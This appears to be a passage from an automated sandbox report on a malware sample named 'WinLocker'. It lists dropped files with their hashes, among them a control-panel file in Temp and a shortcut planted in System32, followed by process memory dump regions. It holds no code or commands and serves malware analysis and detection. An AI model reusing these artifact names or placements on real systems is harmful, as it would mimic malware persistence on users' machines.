0d7ab5a2a2d8269917d0a78941b0dd32c49d3f3b4292f2109cc44eafca62c1be

SHA512
3ab4b0935f915ebe98110d70176b6792237b8ac07c73be92af994fa121d0acab741e50cc687a51e52e6e81e2204c18029504e25e510108bc65ec9d4cb1114505

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60b3262c3163ee3d466199160b9ed07d

SHA1
994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

SHA256
e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

SHA512
081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ab32499043a441383170e414ca1018f1

SHA1
0027492fe66931ddc2a4639ab5e19fe6a80f6d93

SHA256
62ab54b7dd9bfc934155a94e44911813dfa7d15e8e8076975061a8207b1a6a46

SHA512
6510c0497b0423231bb234cb9289a5fb8c983a9efc750b9390f00fa273f232e2946b9d79a94d87ca1ed4d8a40ee51f82170359fa3e857a294df683914d219f9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl

Filesize
49KB

MD5
8fe4b2ca0b85980b73050ab7e8eb58a8

SHA1
d78af51db795dd51ffe48f96321d7a3fdd853117

SHA256
16160a0f94f668219b4b69aa3c396aef00388c305e66a887f7a891fb460bc914

SHA512
6d73f190d657b9f04887d7d88ef8aa913e61b3eb8de50de4607f035a32fde9f9bb2f76a9918d73039ca294a56d98e2a7de7f233ff5b43079a5d80bbf7b2392f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pnffe3cf.u14.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\WinLocker.lnk

Filesize
104B

MD5
62658c068ffbf0e44a72ac7ad1d0de8c

SHA1
be24daae430936518ccafa73d53e64ca3f29f4b1

SHA256
b87ace89fe7d8861eaa93dde044ba1b74d7fb29b84ec945e5ec681511fe3096a

SHA512
0e56c57ebeaba882ce2b1290f053b2d95367b2809306b31cd7b0fbe7f47c7f656818f8a49311c8bccaa67c8f0b16d6c3d25119289adbfb27b275eb780e8dd036

Download Submit
memory/8-16-0x00007FFF66FC0000-0x00007FFF67A82000-memory.dmp

Filesize
10.8MB

Download
memory/8-41-0x00007FFF66FC0000-0x00007FFF67A82000-memory.dmp

Filesize
10.8MB

Download
memory/1124-32-0x000001D72A250000-0x000001D72A272000-memory.dmp

Filesize
136KB

Download
memory/1168-197-0x000000006AB90000-0x000000006ABA4000-memory.dmp

Filesize
80KB

Download
memory/1444-336-0x000000006AB70000-0x000000006AB84000-memory.dmp

Filesize
80KB

Download
memory/1580-88-0x0000000000F10000-0x0000000000F24000-memory.dmp

Filesize
80KB

Download
memory/1580-89-0x000000006AB70000-0x000000006AB84000-memory.dmp

Filesize
80KB

Download
memory/1796-0-0x00007FFF66FC3000-0x00007FFF66FC5000-memory.dmp

Filesize
8KB

Download
memory/1796-146-0x00007FFF66FC0000-0x00007FFF67A82000-memory.dmp

Filesize
10.8MB

Download
memory/1796-2-0x00007FFF66FC0000-0x00007FFF67A82000-memory.dmp

Filesize
10.8MB

Download
memory/1796-1-0x0000000000A00000-0x0000000000B5A000-memory.dmp

Filesize
1.4MB

Download
memory/2200-37-0x000002C461160000-0x000002C461688000-memory.dmp

Filesize
5.2MB

Download
memory/2200-21-0x0000000000C10000-0x0000000000C24000-memory.dmp

Filesize
80KB

Download
memory/2200-22-0x000000006ABB0000-0x000000006ABC4000-memory.dmp

Filesize
80KB

Download
memory/2968-70-0x000000006ABB0000-0x000000006ABC4000-memory.dmp

Filesize
80KB

Download
memory/2968-71-0x0000000004C00000-0x0000000004C12000-memory.dmp

Filesize
72KB

Download
memory/3120-228-0x000000006AB90000-0x000000006ABA4000-memory.dmp

Filesize
80KB

Download
memory/3276-239-0x000002831EFE0000-0x000002831EFE1000-memory.dmp

Filesize
4KB

Download
memory/3276-247-0x000002831EFE0000-0x000002831EFE1000-memory.dmp

Filesize
4KB

Download
memory/3276-252-0x000002831EFE0000-0x000002831EFE1000-memory.dmp

Filesize
4KB

Download
memory/3276-251-0x000002831EFE0000-0x000002831EFE1000-memory.dmp

Filesize
4KB

Download
memory/3276-250-0x000002831EFE0000-0x000002831EFE1000-memory.dmp

Filesize
4KB

Download
memory/3276-249-0x000002831EFE0000-0x000002831EFE1000-memory.dmp

Filesize
4KB

Download
memory/3276-248-0x000002831EFE0000-0x000002831EFE1000-memory.dmp

Filesize
4KB

Download
memory/3276-240-0x000002831EFE0000-0x000002831EFE1000-memory.dmp

Filesize
4KB

Download
memory/3276-246-0x000002831EFE0000-0x000002831EFE1000-memory.dmp

Filesize
4KB

Download
memory/3276-241-0x000002831EFE0000-0x000002831EFE1000-memory.dmp

Filesize
4KB

Download
memory/3704-270-0x000000006AB90000-0x000000006ABA4000-memory.dmp

Filesize
80KB

Download
memory/3996-46-0x000000006ABB0000-0x000000006ABC4000-memory.dmp

Filesize
80KB

Download
memory/4412-303-0x000000006AB90000-0x000000006ABA4000-memory.dmp

Filesize
80KB

Download
memory/4616-119-0x00000000009E0000-0x00000000009F4000-memory.dmp

Filesize
80KB

Download
memory/4616-120-0x000000006AB90000-0x000000006ABA4000-memory.dmp

Filesize
80KB

Download